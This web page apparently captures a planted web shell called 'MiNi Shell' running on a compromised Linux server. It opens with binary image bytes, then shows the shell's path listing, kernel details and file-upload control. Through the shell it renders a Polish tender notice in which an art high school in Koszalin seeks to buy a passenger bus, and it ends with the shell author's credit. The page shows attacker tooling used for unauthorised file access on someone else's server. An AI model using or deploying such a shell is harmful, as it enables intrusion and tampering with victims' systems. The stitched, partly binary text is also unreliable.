JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251006/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251006/0045972201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP BUSA OSOBOWEGO DLA PLSP w KOSZALINIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWE LICEUM SZTUK PLASTYCZNYCH IM. WŁADYSŁAWA HASIORA W KOSZALINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 331350583</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Racławicka 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-620</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">943425759</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@plastyk.webd.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.plastyk.webd.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP BUSA OSOBOWEGO DLA PLSP w KOSZALINIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0e126f76-14da-4bdc-9203-2da9c360237d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00459722</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00423080/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 ZAKUP BUSA OSOBOWEGO DLA PLSP w KOSZALINIE</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0e126f76-14da-4bdc-9203-2da9c360237d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zawarte są na stronie: https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, RODO) informuję, iż:<br/>1.	Administratorem Państwa danych osobowych jest Państwowe Liceum Sztuk Plastycznych im. Władysława Hasiora w Koszalinie tel. 94 342 59 57, <br/>e mail: sekretariat@plastyk.webd.pl<br/>2.	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pisząc na adres: iodo@plastyk.webd.pl<br/>3.	Celem przetwarzania danych jest prawidłowe przeprowadzenie postępowania związanego z ogłoszonym zamówieniem publicznym, zgodnie z obowiązującymi przepisami.<br/>4.	Dane osobowe przetwarzane będą:<br/>a)	w celu prawidłowego przeprowadzenia postępowania: zbieranie ofert,<br/>wszelkiego rodzaju kontakty z oferentami, publikowanie ofert na stronie<br/>Zamawiającego, opublikowanie informacji o wyborze najkorzystniejszej oferty – czyli wypełnienie obowiązków prawnych oraz realizacja zadań publicznych Szkoły (art. 6 ust 1 lit c) oraz art. 6 ust 1 lit e) RODO)<br/>b)	w celach dowodowych związanych z ewentualną obsługą roszczeń<br/>wynikających z przeprowadzonego postępowania – na podstawie art. 6 ust 1 lit f) RODO<br/>5.	Dane będą przechowywane do momentu wygaśnięcia obowiązku przechowywania danych wynikającego z przepisów.<br/>6.	Odbiorcami Państwa danych osobowych mogą być podmioty umocowane na<br/>podstawie przepisów prawa lub wspierające realizację celów w ramach podpisanych umów ze Szkołą.<br/>7.	Przysługuje Państwu prawo dostępu do treści swoich danych, otrzymywania ich kopii<br/>oraz z zastrzeżeniem przepisów prawa przysługuje prawo do: sprostowania danych, ograniczenia przetwarzania danych, przenoszenia danych, wniesienia sprzeciwu wobec przetwarzania danych osobowych.<br/>8.	Przysługuje Państwu prawo do złożenia skargi do organu nadzorczego, którym jest Urząd Ochrony Danych Osobowych.<br/>9.	Podanie przez Państwa danych osobowych jest niezbędne do udziału w<br/>postępowaniu ofertowym a brak ich podania skutkuje brakiem możliwości udziału w postępowaniu.<br/>10.	Państwa dane osobowe nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji ani profilowania, o którym mowa w art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, RODO) informuję, iż:<br/>1.	Administratorem Państwa danych osobowych jest Państwowe Liceum Sztuk Plastycznych im. Władysława Hasiora w Koszalinie tel. 94 342 59 57, <br/>e mail: sekretariat@plastyk.webd.pl<br/>2.	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pisząc na adres: iodo@plastyk.webd.pl<br/>3.	Celem przetwarzania danych jest prawidłowe przeprowadzenie postępowania związanego z ogłoszonym zamówieniem publicznym, zgodnie z obowiązującymi przepisami.<br/>4.	Dane osobowe przetwarzane będą:<br/>a)	w celu prawidłowego przeprowadzenia postępowania: zbieranie ofert,<br/>wszelkiego rodzaju kontakty z oferentami, publikowanie ofert na stronie<br/>Zamawiającego, opublikowanie informacji o wyborze najkorzystniejszej oferty – czyli wypełnienie obowiązków prawnych oraz realizacja zadań publicznych Szkoły (art. 6 ust 1 lit c) oraz art. 6 ust 1 lit e) RODO)<br/>b)	w celach dowodowych związanych z ewentualną obsługą roszczeń<br/>wynikających z przeprowadzonego postępowania – na podstawie art. 6 ust 1 lit f) RODO<br/>5.	Dane będą przechowywane do momentu wygaśnięcia obowiązku przechowywania danych wynikającego z przepisów.<br/>6.	Odbiorcami Państwa danych osobowych mogą być podmioty umocowane na<br/>podstawie przepisów prawa lub wspierające realizację celów w ramach podpisanych umów ze Szkołą.<br/>7.	Przysługuje Państwu prawo dostępu do treści swoich danych, otrzymywania ich kopii<br/>oraz z zastrzeżeniem przepisów prawa przysługuje prawo do: sprostowania danych, ograniczenia przetwarzania danych, przenoszenia danych, wniesienia sprzeciwu wobec przetwarzania danych osobowych.<br/>8.	Przysługuje Państwu prawo do złożenia skargi do organu nadzorczego, którym jest Urząd Ochrony Danych Osobowych.<br/>9.	Podanie przez Państwa danych osobowych jest niezbędne do udziału w<br/>postępowaniu ofertowym a brak ich podania skutkuje brakiem możliwości udziału w postępowaniu.<br/>10.	Państwa dane osobowe nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji ani profilowania, o którym mowa w art. 22 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PLSP.IT.26.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> OPIS PRZEDMIOTU ZAMÓWIENIA <br/><br/>Zakup busa osobowego, fabrycznie nowego - rok produkcji 2025. o parametrach opisanych poniżej.<br/>Wymagania Zamawiającego: Spełnienie wszystkich wymagań zawartych w niniejszej tabeli jest obowiązkowe i brak ich spełnienia w ofercie będzie skutkował jej odrzuceniem.<br/><br/>I. Cechy i parametry przedmiotu zamówienia.<br/>	<br/>1. Typ nadwozia	samochód osobowy przystosowany do przewozu osób od 7 do 9 osób z kierowcą i ładunku, o masie całkowitej do 3,5 t. mikrobus, bus<br/>2. Rodzaj silnika	silnik wysokoprężny - diesel<br/>3. Moc silnika	minimalna 130 KM<br/>4. Pojemność skokowa silnika	minimalna 1900 cm3 - maksymalna 2300 cm3<br/>5. Rodzaj paliwa	olej napędowy<br/>6. Skrzynia biegów	automatyczna lub manualna<br/>7. Napęd	na przednie koła<br/>8. Kolor nadwozia	czarny, szary, biały, niebieski, granatowy, lub srebrny, dopuszcza się odcienie metaliczne lub perłowe.<br/>9. Ilość miejsc siedzących	minimalnie 7, maksymalnie 9 w tym miejsce kierowcy <br/>10. Tylna kanapa	siedzenie tylne demontowane, zamocowane na prowadnicach<br/>11. Wymiary przestrzeni ładunkowej po wyjęciu tylnych rzędów siedzeń	szerokość minimum 1,1 m oraz długość minimum 1,7 m.<br/>12. Koła/opony	koła w rozmiarze min. 16”/ na felgach stalowych lub aluminiowych z oponami letnimi plus komplet opon zimowych <br/>13. Koło zapasowe	pełnowymiarowe <br/>14. Kierownica	układ kierowniczy ze wspomaganiem<br/>15. Dodatkowe systemy	centralny zamek,<br/>immobiliser,<br/>gniazdo 12V<br/>16. Multimedia	interfejs Android Auto, system multimedialny <br/>17. Nawigacja z GPS	wbudowana<br/>18. Wyposażenie	minimum dwa komplety kluczyków do pojazdu;<br/>dywaniki gumowe,<br/>trójkąt ostrzegawczy,<br/>gaśnica samochodowa,<br/>apteczkę,<br/>podnośnik do kół, klucz do kół,<br/><br/>19. Klimatyzacja	automatyczna<br/>20. Lusterka boczne zewnętrzne	regulowane elektrycznie,<br/>składane elektrycznie, podgrzewane<br/>21. Wspomaganie parkowania	czujniki z przodu i z tyłu pojazdu<br/>22. Kamera wspomagająca parkowanie (kamera cofania)<br/>23. Kierownica regulowana w 2 płaszczyznach<br/>24. Szyby boczne przednie opuszczane elektrycznie<br/>25. Szyby boczne środkowe i tylne	stałe lub elektryczne, lub mieszane. <br/>26. Poduszki powietrzne	minimalnie: dla kierowcy i pasażera<br/>27. System bezpieczeństwa ABS<br/>28. Światła przednie (główne)	w technologii LED<br/>29. Pasy bezpieczeństwa z napinaczami w przednich i bocznych tylnych fotelach<br/>29	Gwarancja	min. 24 m-sce<br/>30	Pakiet ubezpieczeniowy	Wymagane jest zawarcie w cenie oferty pakietu ubezpieczeniowego OC/AC/Assistance, ważnego na co najmniej 12 miesięcy od dnia odbioru pojazdu.<br/>31	Usługa rejestracji	Wymagane jest, aby Wykonawca w ramach ceny oferty dokonał rejestracji pojazdu w wydziale komunikacji oraz dostarczył Zamawiającemu komplet dokumentów pojazdu wraz z tablicami rejestracyjnymi.<br/><br/>II Dodatkowe informacje.<br/><br/>2.	Samochód musi posiadać homologację, wystawioną zgodnie z ustawą z dnia 14 kwietnia 2023 roku o systemach homologacji pojazdów oraz ich wyposażenia (Dz. U. z 2023 r. poz. 919 ze zm.).<br/>3.	Samochód musi posiadać komplet dokumentacji technicznej – eksploatacyjnej.<br/>3.1.	instrukcję obsługi w języku polskim,<br/>3.2.	kartę gwarancyjną wraz z listą punktów serwisowych na terenie całego kraju,<br/>3.3.	świadectwo homologacji (wyciąg lub jego odpis) i karta pojazdu,<br/>3.4.	książkę serwisową-harmonogram przeglądów okresowych z zakresem czynności dla pojazdu,<br/>3.5.	inne dokumenty konieczne do zarejestrowania i użytkowania pojazdu.<br/><br/>4.	Przedmiot zamówienia należy dostarczyć do siedziby Zamawiającego: <br/>Państwowego Liceum Sztuk Plastycznych im. Władysława Hasiora w Koszalinie, <br/>ul. Racławicka 9, 57-620 Koszalin<br/>5.	Zamawiający nie dopuszcza składania ofert w postaci katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34110000-1 - Samochody osobowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteria oceny wyboru ofert<br/>Cena brutto – 80 % Gwarancja – 20 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące<br/>warunki:<br/>2.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>2.3.	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>2.4.	zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zgodnie z zapisami w SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty załączone do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Nie dotyczy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie i na warunkach określonych poniżej. Zmiany te nie będą miały charakteru istotnego w rozumieniu art. 455 ust. 1 Ustawy PZP.<br/><br/>2.	Zmiana terminu realizacji umowy: W uzasadnionych przypadkach, Zamawiający może wyrazić zgodę na zmianę terminu dostawy pojazdu, o ile opóźnienie jest spowodowane okolicznościami, których nie można było przewidzieć w chwili zawarcia umowy, a nie jest ono wynikiem winy Wykonawcy. Dotyczy to np. opóźnień w dostawie komponentów, transportu, lub innych czynników związanych z produkcją, które Wykonawca udokumentuje w sposób wiarygodny.<br/><br/>3.	Zmiana osób upoważnionych: W przypadku zmiany personelu po którejkolwiek ze stron, w tym zmiany osób upoważnionych do kontaktów, Zamawiający lub Wykonawca jest zobowiązany do niezwłocznego pisemnego powiadomienia drugiej strony.<br/><br/>4.	Zmiany przepisów prawa: W przypadku zmiany powszechnie obowiązujących przepisów prawa, w tym przepisów dotyczących homologacji, rejestracji lub warunków technicznych pojazdów, w zakresie mającym wpływ na realizację umowy.<br/><br/>5.	Siła wyższa: W sytuacji wystąpienia siły wyższej, rozumianej jako zdarzenie zewnętrzne, niemożliwe do przewidzenia, które uniemożliwia realizację umowy zgodnie z pierwotnymi warunkami.<br/><br/>6.	Wszelkie zmiany i uzupełnienia postanowień umowy wymagają formy pisemnego aneksu pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com